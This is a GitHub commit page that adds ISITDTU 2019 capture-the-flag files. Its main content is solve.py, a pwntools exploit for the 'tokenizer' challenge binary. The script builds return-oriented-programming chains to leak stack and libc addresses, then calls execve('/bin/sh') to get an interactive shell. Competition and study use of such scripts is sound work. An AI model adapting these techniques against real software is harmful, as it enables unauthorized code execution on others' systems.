Commit b797270

committed

add ISITDTU 2019

1 parent efdd7f7 commit b797270Copy full SHA for b797270

File tree

5 files changed

+77

-0

lines changed

ISITDTU2019_iz_heap_lv2
- iz_heap_lv2.i64
ISITDTU2019_tokenizer

5 files changed

+77

-0

lines changed

`‎ISITDTU2019_iz_heap_lv2/iz_heap_lv2.i64‎`

0 Bytes

Binary file not shown.

`‎ISITDTU2019_tokenizer/libc-2.27.so‎`

1.94 MB

Binary file not shown.

`‎ISITDTU2019_tokenizer/solve.py‎`

Lines changed: 77 additions & 0 deletions

Original file line number	Diff line number	Diff line change
`@@ -0,0 +1,77 @@`
	`1`	`+#!/usr/bin/env python`
	`2`	`+# -- coding: utf-8 --`
	`3`	`+`
	`4`	`+from pwn import *`
	`5`	`+from time import sleep`
	`6`	`+context.log_level = "critical"`
	`7`	`+context.binary = "./tokenizer"`
	`8`	`+elf = context.binary`
	`9`	`+libc = elf.libc`
	`10`	`+`
	`11`	`+def DEBUG():`
	`12`	`+ gdb.attach(io, '''`
	`13`	`+ b *0x4012B3`
	`14`	`+ b *0x40125E`
	`15`	`+ c`
	`16`	`+ ''')`
	`17`	`+ sleep(0.5)`
	`18`	`+`
	`19`	`+`
	`20`	`+io = process("./tokenizer")`
	`21`	`+`
	`22`	`+key = 0xf0`
	`23`	`+rop = flat(`
	`24`	`+ 0x000000000040149b, # pop rdi; ret;`
	`25`	`+ 0x404020, # std::cout`
	`26`	`+ 0x0000000000401499, # pop rsi; pop r15; ret;`
	`27`	`+ elf.got['strsep'],`
	`28`	`+ 0,`
	`29`	`+ 0x401080, # std::basic_ostream`
	`30`	`+ 0x4010F0 + 2 # _start`
	`31`	`+ )`
	`32`	`+payload = fit({`
	`33`	`+ 0x338: rop`
	`34`	`+ }, filler = 'x', length = 0x400).replace('\x00', chr(key))`
	`35`	`+`
	`36`	`+io.sendlineafter(": ", payload)`
	`37`	`+stack = u64(io.recvuntil("\x7f")[-6: ] + '0円0円')`
	`38`	`+print("[+] stack @ {:#x}".format(stack))`
	`39`	`+`
	`40`	`+# assert stack & 0xff == key`
	`41`	`+`
	`42`	`+io.sendlineafter(": ", p8(key))`
	`43`	`+io.recvuntil("\x7f")`
	`44`	`+libc.address = u64(io.recvuntil("\x7f")[-6: ] + '0円0円') - libc.sym['strsep']`
	`45`	`+print("[+] libc @ {:#x}".format(libc.address))`
	`46`	`+# assert libc.address & 0xfff == 0x000`
	`47`	`+`
	`48`	`+key = 0x60`
	`49`	`+rop = flat(`
	`50`	`+ 0x000000000040149b, # pop rdi; ret;`
	`51`	`+ next(libc.search("/bin/sh")),`
	`52`	`+ libc.address + 0x00000000001306d9, # pop rdx; pop rsi; ret;`
	`53`	`+ 0,`
	`54`	`+ 0,`
	`55`	`+ libc.sym['execve']`
	`56`	`+ )`
	`57`	`+payload = fit({`
	`58`	`+ 0x3c8: rop`
	`59`	`+ }, filler = 'x', length = 0x400).replace('\x00', chr(key))`
	`60`	`+`
	`61`	`+# io.sendlineafter(": ", cyclic(0x400, n = 8))`
	`62`	`+# DEBUG()`
	`63`	`+io.sendlineafter(": ", payload)`
	`64`	`+io.recvuntil("\x7f")`
	`65`	`+io.recvuntil("\x7f")`
	`66`	`+stack = u64(io.recvuntil("\x7f")[-6: ] + '0円0円')`
	`67`	`+print("[+] stack @ {:#x}".format(stack))`
	`68`	`+`
	`69`	`+# assert stack & 0xff == key`
	`70`	`+`
	`71`	`+io.sendlineafter(": ", p8(key))`
	`72`	`+io.recv()`
	`73`	`+`
	`74`	`+io.interactive()`
	`75`	`+'''`
	`76`	`+$ for i in $(seq 1 20); do python solve.py; done`
	`77`	`+'''`

`‎ISITDTU2019_tokenizer/tokenizer‎`

13.9 KB

Binary file not shown.

`‎ISITDTU2019_tokenizer/tokenizer.i64‎`

186 KB

Binary file not shown.

0 commit comments

Comments

(0)

Navigation Menu

Search code, repositories, users, issues, pull requests...

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Commit b797270

File tree

5 files changed

5 files changed

`‎ISITDTU2019_iz_heap_lv2/iz_heap_lv2.i64‎`

`‎ISITDTU2019_tokenizer/libc-2.27.so‎`

`‎ISITDTU2019_tokenizer/solve.py‎`

`‎ISITDTU2019_tokenizer/tokenizer‎`

`‎ISITDTU2019_tokenizer/tokenizer.i64‎`

0 commit comments